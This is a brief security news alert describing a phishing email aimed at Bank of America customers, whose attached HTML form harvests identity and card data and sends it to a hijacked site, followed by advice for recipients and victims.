Bank of America customers should beware of fake emails that inform them of irregular activity detected on their account.
According to Stop Malvertising, the emails inform recipients that their bank account has been limited and that they must follow the steps in the attached file in order to regain full access to it.
The attached file is an HTML document that fetches information from the genuine Bank of America website and a hijacked site hosted at http://www.eetkroegmanu.be.
The form instructs victims to enter their name, contact information, date of birth, driver’s license number, social security number, mother’s maiden name, payment card information (including PIN), online ID, password to the account, and secret questions.
From the BoA site, images are retrieved. The other website is used to host the stolen information. As you might have guessed, the information collected by the cybercriminals can be used for all sorts of malicious purposes, including identity theft.
If you come across such emails, delete them at once. If you’re a victim, change your passwords, contact your bank, and keep a close eye on your account.